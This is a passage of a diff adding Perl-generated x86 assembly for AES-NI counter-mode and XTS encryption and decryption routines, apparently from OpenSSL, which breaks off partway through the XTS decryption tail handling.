+	&cmp	($len,2);
+	&jb	(&label("ctr32_one"));
+
+	&pshufd	($inout2,$rndkey0,1<<6);
+	&por	($inout1,$inout5);
+	&je	(&label("ctr32_two"));
+
+	&pshufd	($inout3,$rndkey1,3<<6);
+	&por	($inout2,$inout5);
+	&cmp	($len,4);
+	&jb	(&label("ctr32_three"));
+
+	&pshufd	($inout4,$rndkey1,2<<6);
+	&por	($inout3,$inout5);
+	&je	(&label("ctr32_four"));
+
+	&por	($inout4,$inout5);
+	&call	("_aesni_encrypt6");
+	&movups	($rndkey1,&QWP(0,$inp));
+	&movups	($rndkey0,&QWP(0x10,$inp));
+	&xorps	($inout0,$rndkey1);
+	&movups	($rndkey1,&QWP(0x20,$inp));
+	&xorps	($inout1,$rndkey0);
+	&movups	($rndkey0,&QWP(0x30,$inp));
+	&xorps	($inout2,$rndkey1);
+	&movups	($rndkey1,&QWP(0x40,$inp));
+	&xorps	($inout3,$rndkey0);
+	&movups	(&QWP(0,$out),$inout0);
+	&xorps	($inout4,$rndkey1);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+	&movups	(&QWP(0x40,$out),$inout4);
+	&jmp	(&label("ctr32_ret"));
+
+&set_label("ctr32_one_shortcut",16);
+	&movups	($inout0,&QWP(0,$rounds_));	# load ivec
+	&mov	($rounds,&DWP(240,$key));
+	
+&set_label("ctr32_one");
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&movups	($in0,&QWP(0,$inp));
+	&xorps	($in0,$inout0);
+	&movups	(&QWP(0,$out),$in0);
+	&jmp	(&label("ctr32_ret"));
+
+&set_label("ctr32_two",16);
+	&call	("_aesni_encrypt2");
+	&movups	($inout3,&QWP(0,$inp));
+	&movups	($inout4,&QWP(0x10,$inp));
+	&xorps	($inout0,$inout3);
+	&xorps	($inout1,$inout4);
+	&movups	(&QWP(0,$out),$inout0);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&jmp	(&label("ctr32_ret"));
+
+&set_label("ctr32_three",16);
+	&call	("_aesni_encrypt3");
+	&movups	($inout3,&QWP(0,$inp));
+	&movups	($inout4,&QWP(0x10,$inp));
+	&xorps	($inout0,$inout3);
+	&movups	($inout5,&QWP(0x20,$inp));
+	&xorps	($inout1,$inout4);
+	&movups	(&QWP(0,$out),$inout0);
+	&xorps	($inout2,$inout5);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&jmp	(&label("ctr32_ret"));
+
+&set_label("ctr32_four",16);
+	&call	("_aesni_encrypt4");
+	&movups	($inout4,&QWP(0,$inp));
+	&movups	($inout5,&QWP(0x10,$inp));
+	&movups	($rndkey1,&QWP(0x20,$inp));
+	&xorps	($inout0,$inout4);
+	&movups	($rndkey0,&QWP(0x30,$inp));
+	&xorps	($inout1,$inout5);
+	&movups	(&QWP(0,$out),$inout0);
+	&xorps	($inout2,$rndkey1);
+	&movups	(&QWP(0x10,$out),$inout1);
+	&xorps	($inout3,$rndkey0);
+	&movups	(&QWP(0x20,$out),$inout2);
+	&movups	(&QWP(0x30,$out),$inout3);
+
+&set_label("ctr32_ret");
+	&mov	("esp",&DWP(80,"esp"));
+&function_end("aesni_ctr32_encrypt_blocks");
+
+######################################################################
+# void aesni_xts_[en|de]crypt(const char *inp,char *out,size_t len,
+#	const AES_KEY *key1, const AES_KEY *key2
+#	const unsigned char iv[16]);
+#
+{ my ($tweak,$twtmp,$twres,$twmask)=($rndkey1,$rndkey0,$inout0,$inout1);
+
+&function_begin("aesni_xts_encrypt");
+	&mov	($key,&wparam(4));		# key2
+	&mov	($inp,&wparam(5));		# clear-text tweak
+
+	&mov	($rounds,&DWP(240,$key));	# key2->rounds
+	&movups	($inout0,&QWP(0,$inp));
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));		# key1
+
+	&mov	($key_,"esp");
+	&sub	("esp",16*7+8);
+	&mov	($rounds,&DWP(240,$key));	# key1->rounds
+	&and	("esp",-16);			# align stack
+
+	&mov	(&DWP(16*6+0,"esp"),0x87);	# compose the magic constant
+	&mov	(&DWP(16*6+4,"esp"),0);
+	&mov	(&DWP(16*6+8,"esp"),1);
+	&mov	(&DWP(16*6+12,"esp"),0);
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save original $len
+	&mov	(&DWP(16*7+4,"esp"),$key_);	# save original %esp
+
+	&movdqa	($tweak,$inout0);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($twmask,&QWP(6*16,"esp"));	# 0x0...010...87
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+
+	&and	($len,-16);
+	&mov	($key_,$key);			# backup $key
+	&mov	($rounds_,$rounds);		# backup $rounds
+	&sub	($len,16*6);
+	&jc	(&label("xts_enc_short"));
+
+	&shl	($rounds,4);
+	&mov	($rounds_,16);
+	&sub	($rounds_,$rounds);
+	&lea	($key,&DWP(32,$key,$rounds));
+	&jmp	(&label("xts_enc_loop6"));
+
+&set_label("xts_enc_loop6",16);
+	for ($i=0;$i<4;$i++) {
+	    &pshufd	($twres,$twtmp,0x13);
+	    &pxor	($twtmp,$twtmp);
+	    &movdqa	(&QWP(16*$i,"esp"),$tweak);
+	    &paddq	($tweak,$tweak);	# &psllq($tweak,1);
+	    &pand	($twres,$twmask);	# isolate carry and residue
+	    &pcmpgtd	($twtmp,$tweak);	# broadcast upper bits
+	    &pxor	($tweak,$twres);
+	}
+	&pshufd	($inout5,$twtmp,0x13);
+	&movdqa	(&QWP(16*$i++,"esp"),$tweak);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	 &$movekey	($rndkey0,&QWP(0,$key_));
+	&pand	($inout5,$twmask);		# isolate carry and residue
+	 &movups	($inout0,&QWP(0,$inp));	# load input
+	&pxor	($inout5,$tweak);
+
+	# inline _aesni_encrypt6 prologue and flip xor with tweak and key[0]
+	&mov	($rounds,$rounds_);		# restore $rounds
+	&movdqu	($inout1,&QWP(16*1,$inp));
+	 &xorps		($inout0,$rndkey0);	# input^=rndkey[0]
+	&movdqu	($inout2,&QWP(16*2,$inp));
+	 &pxor		($inout1,$rndkey0);
+	&movdqu	($inout3,&QWP(16*3,$inp));
+	 &pxor		($inout2,$rndkey0);
+	&movdqu	($inout4,&QWP(16*4,$inp));
+	 &pxor		($inout3,$rndkey0);
+	&movdqu	($rndkey1,&QWP(16*5,$inp));
+	 &pxor		($inout4,$rndkey0);
+	&lea	($inp,&DWP(16*6,$inp));
+	&pxor	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movdqa	(&QWP(16*$i,"esp"),$inout5);	# save last tweak
+	&pxor	($inout5,$rndkey1);
+
+	 &$movekey	($rndkey1,&QWP(16,$key_));
+	&pxor	($inout1,&QWP(16*1,"esp"));
+	&pxor	($inout2,&QWP(16*2,"esp"));
+	 &aesenc	($inout0,$rndkey1);
+	&pxor	($inout3,&QWP(16*3,"esp"));
+	&pxor	($inout4,&QWP(16*4,"esp"));
+	 &aesenc	($inout1,$rndkey1);
+	&pxor		($inout5,$rndkey0);
+	 &$movekey	($rndkey0,&QWP(32,$key_));
+	 &aesenc	($inout2,$rndkey1);
+	 &aesenc	($inout3,$rndkey1);
+	 &aesenc	($inout4,$rndkey1);
+	 &aesenc	($inout5,$rndkey1);
+	&call		(&label("_aesni_encrypt6_enter"));
+
+	&movdqa	($tweak,&QWP(16*5,"esp"));	# last tweak
+       &pxor	($twtmp,$twtmp);
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+       &pcmpgtd	($twtmp,$tweak);		# broadcast upper bits
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout2,&QWP(16*2,"esp"));
+	&movups	(&QWP(16*1,$out),$inout1);
+	&xorps	($inout3,&QWP(16*3,"esp"));
+	&movups	(&QWP(16*2,$out),$inout2);
+	&xorps	($inout4,&QWP(16*4,"esp"));
+	&movups	(&QWP(16*3,$out),$inout3);
+	&xorps	($inout5,$tweak);
+	&movups	(&QWP(16*4,$out),$inout4);
+       &pshufd	($twres,$twtmp,0x13);
+	&movups	(&QWP(16*5,$out),$inout5);
+	&lea	($out,&DWP(16*6,$out));
+       &movdqa	($twmask,&QWP(16*6,"esp"));	# 0x0...010...87
+
+	&pxor	($twtmp,$twtmp);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+
+	&sub	($len,16*6);
+	&jnc	(&label("xts_enc_loop6"));
+
+	&mov	($rounds,&DWP(240,$key_));	# restore $rounds
+	&mov	($key,$key_);			# restore $key
+	&mov	($rounds_,$rounds);
+
+&set_label("xts_enc_short");
+	&add	($len,16*6);
+	&jz	(&label("xts_enc_done6x"));
+
+	&movdqa	($inout3,$tweak);		# put aside previous tweak
+	&cmp	($len,0x20);
+	&jb	(&label("xts_enc_one"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&je	(&label("xts_enc_two"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($inout4,$tweak);		# put aside previous tweak
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&cmp	($len,0x40);
+	&jb	(&label("xts_enc_three"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($inout5,$tweak);		# put aside previous tweak
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&movdqa	(&QWP(16*0,"esp"),$inout3);
+	&movdqa	(&QWP(16*1,"esp"),$inout4);
+	&je	(&label("xts_enc_four"));
+
+	&movdqa	(&QWP(16*2,"esp"),$inout5);
+	&pshufd	($inout5,$twtmp,0x13);
+	&movdqa	(&QWP(16*3,"esp"),$tweak);
+	&paddq	($tweak,$tweak);		# &psllq($inout0,1);
+	&pand	($inout5,$twmask);		# isolate carry and residue
+	&pxor	($inout5,$tweak);
+
+	&movdqu	($inout0,&QWP(16*0,$inp));	# load input
+	&movdqu	($inout1,&QWP(16*1,$inp));
+	&movdqu	($inout2,&QWP(16*2,$inp));
+	&pxor	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movdqu	($inout3,&QWP(16*3,$inp));
+	&pxor	($inout1,&QWP(16*1,"esp"));
+	&movdqu	($inout4,&QWP(16*4,$inp));
+	&pxor	($inout2,&QWP(16*2,"esp"));
+	&lea	($inp,&DWP(16*5,$inp));
+	&pxor	($inout3,&QWP(16*3,"esp"));
+	&movdqa	(&QWP(16*4,"esp"),$inout5);	# save last tweak
+	&pxor	($inout4,$inout5);
+
+	&call	("_aesni_encrypt6");
+
+	&movaps	($tweak,&QWP(16*4,"esp"));	# last tweak
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,&QWP(16*2,"esp"));
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout3,&QWP(16*3,"esp"));
+	&movups	(&QWP(16*1,$out),$inout1);
+	&xorps	($inout4,$tweak);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&movups	(&QWP(16*3,$out),$inout3);
+	&movups	(&QWP(16*4,$out),$inout4);
+	&lea	($out,&DWP(16*5,$out));
+	&jmp	(&label("xts_enc_done"));
+
+&set_label("xts_enc_one",16);
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&lea	($inp,&DWP(16*1,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&lea	($out,&DWP(16*1,$out));
+
+	&movdqa	($tweak,$inout3);		# last tweak
+	&jmp	(&label("xts_enc_done"));
+
+&set_label("xts_enc_two",16);
+	&movaps	($inout4,$tweak);		# put aside last tweak
+
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&lea	($inp,&DWP(16*2,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	&xorps	($inout1,$inout4);
+
+	&call	("_aesni_encrypt2");
+
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&xorps	($inout1,$inout4);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&movups	(&QWP(16*1,$out),$inout1);
+	&lea	($out,&DWP(16*2,$out));
+
+	&movdqa	($tweak,$inout4);		# last tweak
+	&jmp	(&label("xts_enc_done"));
+
+&set_label("xts_enc_three",16);
+	&movaps	($inout5,$tweak);		# put aside last tweak
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&movups	($inout2,&QWP(16*2,$inp));
+	&lea	($inp,&DWP(16*3,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	&xorps	($inout1,$inout4);
+	&xorps	($inout2,$inout5);
+
+	&call	("_aesni_encrypt3");
+
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&xorps	($inout1,$inout4);
+	&xorps	($inout2,$inout5);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&movups	(&QWP(16*1,$out),$inout1);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&lea	($out,&DWP(16*3,$out));
+
+	&movdqa	($tweak,$inout5);		# last tweak
+	&jmp	(&label("xts_enc_done"));
+
+&set_label("xts_enc_four",16);
+	&movaps	($inout4,$tweak);		# put aside last tweak
+
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&movups	($inout2,&QWP(16*2,$inp));
+	&xorps	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movups	($inout3,&QWP(16*3,$inp));
+	&lea	($inp,&DWP(16*4,$inp));
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,$inout5);
+	&xorps	($inout3,$inout4);
+
+	&call	("_aesni_encrypt4");
+
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,$inout5);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout3,$inout4);
+	&movups	(&QWP(16*1,$out),$inout1);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&movups	(&QWP(16*3,$out),$inout3);
+	&lea	($out,&DWP(16*4,$out));
+
+	&movdqa	($tweak,$inout4);		# last tweak
+	&jmp	(&label("xts_enc_done"));
+
+&set_label("xts_enc_done6x",16);		# $tweak is pre-calculated
+	&mov	($len,&DWP(16*7+0,"esp"));	# restore original $len
+	&and	($len,15);
+	&jz	(&label("xts_enc_ret"));
+	&movdqa	($inout3,$tweak);
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save $len%16
+	&jmp	(&label("xts_enc_steal"));
+
+&set_label("xts_enc_done",16);
+	&mov	($len,&DWP(16*7+0,"esp"));	# restore original $len
+	&pxor	($twtmp,$twtmp);
+	&and	($len,15);
+	&jz	(&label("xts_enc_ret"));
+
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save $len%16
+	&pshufd	($inout3,$twtmp,0x13);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($inout3,&QWP(16*6,"esp"));	# isolate carry and residue
+	&pxor	($inout3,$tweak);
+
+&set_label("xts_enc_steal");
+	&movz	($rounds,&BP(0,$inp));
+	&movz	($key,&BP(-16,$out));
+	&lea	($inp,&DWP(1,$inp));
+	&mov	(&BP(-16,$out),&LB($rounds));
+	&mov	(&BP(0,$out),&LB($key));
+	&lea	($out,&DWP(1,$out));
+	&sub	($len,1);
+	&jnz	(&label("xts_enc_steal"));
+
+	&sub	($out,&DWP(16*7+0,"esp"));	# rewind $out
+	&mov	($key,$key_);			# restore $key
+	&mov	($rounds,$rounds_);		# restore $rounds
+
+	&movups	($inout0,&QWP(-16,$out));	# load input
+	&xorps	($inout0,$inout3);		# input^=tweak
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&movups	(&QWP(-16,$out),$inout0);	# write output
+
+&set_label("xts_enc_ret");
+	&mov	("esp",&DWP(16*7+4,"esp"));	# restore %esp
+&function_end("aesni_xts_encrypt");
+
+&function_begin("aesni_xts_decrypt");
+	&mov	($key,&wparam(4));		# key2
+	&mov	($inp,&wparam(5));		# clear-text tweak
+
+	&mov	($rounds,&DWP(240,$key));	# key2->rounds
+	&movups	($inout0,&QWP(0,$inp));
+	if ($inline)
+	{   &aesni_inline_generate1("enc");	}
+	else
+	{   &call	("_aesni_encrypt1");	}
+
+	&mov	($inp,&wparam(0));
+	&mov	($out,&wparam(1));
+	&mov	($len,&wparam(2));
+	&mov	($key,&wparam(3));		# key1
+
+	&mov	($key_,"esp");
+	&sub	("esp",16*7+8);
+	&and	("esp",-16);			# align stack
+
+	&xor	($rounds_,$rounds_);		# if(len%16) len-=16;
+	&test	($len,15);
+	&setnz	(&LB($rounds_));
+	&shl	($rounds_,4);
+	&sub	($len,$rounds_);
+
+	&mov	(&DWP(16*6+0,"esp"),0x87);	# compose the magic constant
+	&mov	(&DWP(16*6+4,"esp"),0);
+	&mov	(&DWP(16*6+8,"esp"),1);
+	&mov	(&DWP(16*6+12,"esp"),0);
+	&mov	(&DWP(16*7+0,"esp"),$len);	# save original $len
+	&mov	(&DWP(16*7+4,"esp"),$key_);	# save original %esp
+
+	&mov	($rounds,&DWP(240,$key));	# key1->rounds
+	&mov	($key_,$key);			# backup $key
+	&mov	($rounds_,$rounds);		# backup $rounds
+
+	&movdqa	($tweak,$inout0);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($twmask,&QWP(6*16,"esp"));	# 0x0...010...87
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+
+	&and	($len,-16);
+	&sub	($len,16*6);
+	&jc	(&label("xts_dec_short"));
+
+	&shl	($rounds,4);
+	&mov	($rounds_,16);
+	&sub	($rounds_,$rounds);
+	&lea	($key,&DWP(32,$key,$rounds));
+	&jmp	(&label("xts_dec_loop6"));
+
+&set_label("xts_dec_loop6",16);
+	for ($i=0;$i<4;$i++) {
+	    &pshufd	($twres,$twtmp,0x13);
+	    &pxor	($twtmp,$twtmp);
+	    &movdqa	(&QWP(16*$i,"esp"),$tweak);
+	    &paddq	($tweak,$tweak);	# &psllq($tweak,1);
+	    &pand	($twres,$twmask);	# isolate carry and residue
+	    &pcmpgtd	($twtmp,$tweak);	# broadcast upper bits
+	    &pxor	($tweak,$twres);
+	}
+	&pshufd	($inout5,$twtmp,0x13);
+	&movdqa	(&QWP(16*$i++,"esp"),$tweak);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	 &$movekey	($rndkey0,&QWP(0,$key_));
+	&pand	($inout5,$twmask);		# isolate carry and residue
+	 &movups	($inout0,&QWP(0,$inp));	# load input
+	&pxor	($inout5,$tweak);
+
+	# inline _aesni_encrypt6 prologue and flip xor with tweak and key[0]
+	&mov	($rounds,$rounds_);
+	&movdqu	($inout1,&QWP(16*1,$inp));
+	 &xorps		($inout0,$rndkey0);	# input^=rndkey[0]
+	&movdqu	($inout2,&QWP(16*2,$inp));
+	 &pxor		($inout1,$rndkey0);
+	&movdqu	($inout3,&QWP(16*3,$inp));
+	 &pxor		($inout2,$rndkey0);
+	&movdqu	($inout4,&QWP(16*4,$inp));
+	 &pxor		($inout3,$rndkey0);
+	&movdqu	($rndkey1,&QWP(16*5,$inp));
+	 &pxor		($inout4,$rndkey0);
+	&lea	($inp,&DWP(16*6,$inp));
+	&pxor	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movdqa	(&QWP(16*$i,"esp"),$inout5);	# save last tweak
+	&pxor	($inout5,$rndkey1);
+
+	 &$movekey	($rndkey1,&QWP(16,$key_));
+	&pxor	($inout1,&QWP(16*1,"esp"));
+	&pxor	($inout2,&QWP(16*2,"esp"));
+	 &aesdec	($inout0,$rndkey1);
+	&pxor	($inout3,&QWP(16*3,"esp"));
+	&pxor	($inout4,&QWP(16*4,"esp"));
+	 &aesdec	($inout1,$rndkey1);
+	&pxor		($inout5,$rndkey0);
+	 &$movekey	($rndkey0,&QWP(32,$key_));
+	 &aesdec	($inout2,$rndkey1);
+	 &aesdec	($inout3,$rndkey1);
+	 &aesdec	($inout4,$rndkey1);
+	 &aesdec	($inout5,$rndkey1);
+	&call		(&label("_aesni_decrypt6_enter"));
+
+	&movdqa	($tweak,&QWP(16*5,"esp"));	# last tweak
+       &pxor	($twtmp,$twtmp);
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+       &pcmpgtd	($twtmp,$tweak);		# broadcast upper bits
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout2,&QWP(16*2,"esp"));
+	&movups	(&QWP(16*1,$out),$inout1);
+	&xorps	($inout3,&QWP(16*3,"esp"));
+	&movups	(&QWP(16*2,$out),$inout2);
+	&xorps	($inout4,&QWP(16*4,"esp"));
+	&movups	(&QWP(16*3,$out),$inout3);
+	&xorps	($inout5,$tweak);
+	&movups	(&QWP(16*4,$out),$inout4);
+       &pshufd	($twres,$twtmp,0x13);
+	&movups	(&QWP(16*5,$out),$inout5);
+	&lea	($out,&DWP(16*6,$out));
+       &movdqa	($twmask,&QWP(16*6,"esp"));	# 0x0...010...87
+
+	&pxor	($twtmp,$twtmp);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+
+	&sub	($len,16*6);
+	&jnc	(&label("xts_dec_loop6"));
+
+	&mov	($rounds,&DWP(240,$key_));	# restore $rounds
+	&mov	($key,$key_);			# restore $key
+	&mov	($rounds_,$rounds);
+
+&set_label("xts_dec_short");
+	&add	($len,16*6);
+	&jz	(&label("xts_dec_done6x"));
+
+	&movdqa	($inout3,$tweak);		# put aside previous tweak
+	&cmp	($len,0x20);
+	&jb	(&label("xts_dec_one"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&je	(&label("xts_dec_two"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($inout4,$tweak);		# put aside previous tweak
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&cmp	($len,0x40);
+	&jb	(&label("xts_dec_three"));
+
+	&pshufd	($twres,$twtmp,0x13);
+	&pxor	($twtmp,$twtmp);
+	&movdqa	($inout5,$tweak);		# put aside previous tweak
+	&paddq	($tweak,$tweak);		# &psllq($tweak,1);
+	&pand	($twres,$twmask);		# isolate carry and residue
+	&pcmpgtd($twtmp,$tweak);		# broadcast upper bits
+	&pxor	($tweak,$twres);
+	&movdqa	(&QWP(16*0,"esp"),$inout3);
+	&movdqa	(&QWP(16*1,"esp"),$inout4);
+	&je	(&label("xts_dec_four"));
+
+	&movdqa	(&QWP(16*2,"esp"),$inout5);
+	&pshufd	($inout5,$twtmp,0x13);
+	&movdqa	(&QWP(16*3,"esp"),$tweak);
+	&paddq	($tweak,$tweak);		# &psllq($inout0,1);
+	&pand	($inout5,$twmask);		# isolate carry and residue
+	&pxor	($inout5,$tweak);
+
+	&movdqu	($inout0,&QWP(16*0,$inp));	# load input
+	&movdqu	($inout1,&QWP(16*1,$inp));
+	&movdqu	($inout2,&QWP(16*2,$inp));
+	&pxor	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movdqu	($inout3,&QWP(16*3,$inp));
+	&pxor	($inout1,&QWP(16*1,"esp"));
+	&movdqu	($inout4,&QWP(16*4,$inp));
+	&pxor	($inout2,&QWP(16*2,"esp"));
+	&lea	($inp,&DWP(16*5,$inp));
+	&pxor	($inout3,&QWP(16*3,"esp"));
+	&movdqa	(&QWP(16*4,"esp"),$inout5);	# save last tweak
+	&pxor	($inout4,$inout5);
+
+	&call	("_aesni_decrypt6");
+
+	&movaps	($tweak,&QWP(16*4,"esp"));	# last tweak
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,&QWP(16*2,"esp"));
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout3,&QWP(16*3,"esp"));
+	&movups	(&QWP(16*1,$out),$inout1);
+	&xorps	($inout4,$tweak);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&movups	(&QWP(16*3,$out),$inout3);
+	&movups	(&QWP(16*4,$out),$inout4);
+	&lea	($out,&DWP(16*5,$out));
+	&jmp	(&label("xts_dec_done"));
+
+&set_label("xts_dec_one",16);
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&lea	($inp,&DWP(16*1,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	if ($inline)
+	{   &aesni_inline_generate1("dec");	}
+	else
+	{   &call	("_aesni_decrypt1");	}
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&lea	($out,&DWP(16*1,$out));
+
+	&movdqa	($tweak,$inout3);		# last tweak
+	&jmp	(&label("xts_dec_done"));
+
+&set_label("xts_dec_two",16);
+	&movaps	($inout4,$tweak);		# put aside last tweak
+
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&lea	($inp,&DWP(16*2,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	&xorps	($inout1,$inout4);
+
+	&call	("_aesni_decrypt2");
+
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&xorps	($inout1,$inout4);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&movups	(&QWP(16*1,$out),$inout1);
+	&lea	($out,&DWP(16*2,$out));
+
+	&movdqa	($tweak,$inout4);		# last tweak
+	&jmp	(&label("xts_dec_done"));
+
+&set_label("xts_dec_three",16);
+	&movaps	($inout5,$tweak);		# put aside last tweak
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&movups	($inout2,&QWP(16*2,$inp));
+	&lea	($inp,&DWP(16*3,$inp));
+	&xorps	($inout0,$inout3);		# input^=tweak
+	&xorps	($inout1,$inout4);
+	&xorps	($inout2,$inout5);
+
+	&call	("_aesni_decrypt3");
+
+	&xorps	($inout0,$inout3);		# output^=tweak
+	&xorps	($inout1,$inout4);
+	&xorps	($inout2,$inout5);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&movups	(&QWP(16*1,$out),$inout1);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&lea	($out,&DWP(16*3,$out));
+
+	&movdqa	($tweak,$inout5);		# last tweak
+	&jmp	(&label("xts_dec_done"));
+
+&set_label("xts_dec_four",16);
+	&movaps	($inout4,$tweak);		# put aside last tweak
+
+	&movups	($inout0,&QWP(16*0,$inp));	# load input
+	&movups	($inout1,&QWP(16*1,$inp));
+	&movups	($inout2,&QWP(16*2,$inp));
+	&xorps	($inout0,&QWP(16*0,"esp"));	# input^=tweak
+	&movups	($inout3,&QWP(16*3,$inp));
+	&lea	($inp,&DWP(16*4,$inp));
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,$inout5);
+	&xorps	($inout3,$inout4);
+
+	&call	("_aesni_decrypt4");
+
+	&xorps	($inout0,&QWP(16*0,"esp"));	# output^=tweak
+	&xorps	($inout1,&QWP(16*1,"esp"));
+	&xorps	($inout2,$inout5);
+	&movups	(&QWP(16*0,$out),$inout0);	# write output
+	&xorps	($inout3,$inout4);
+	&movups	(&QWP(16*1,$out),$inout1);
+	&movups	(&QWP(16*2,$out),$inout2);
+	&movups	(&QWP(16*3,$out),$inout3);
+	&lea	($out,&DWP(16*4,$out));
+
+	&movdqa	($tweak,$inout4);		# last tweak
+	&jmp	(&label("xts_dec_done"));
+
+&set_label("xts_dec_done6x",16);		# $tweak is pre-calculated
+	&mov	($len,&DWP(16*7+0,"esp"));	# restore original $len
+	&and	($len,15);
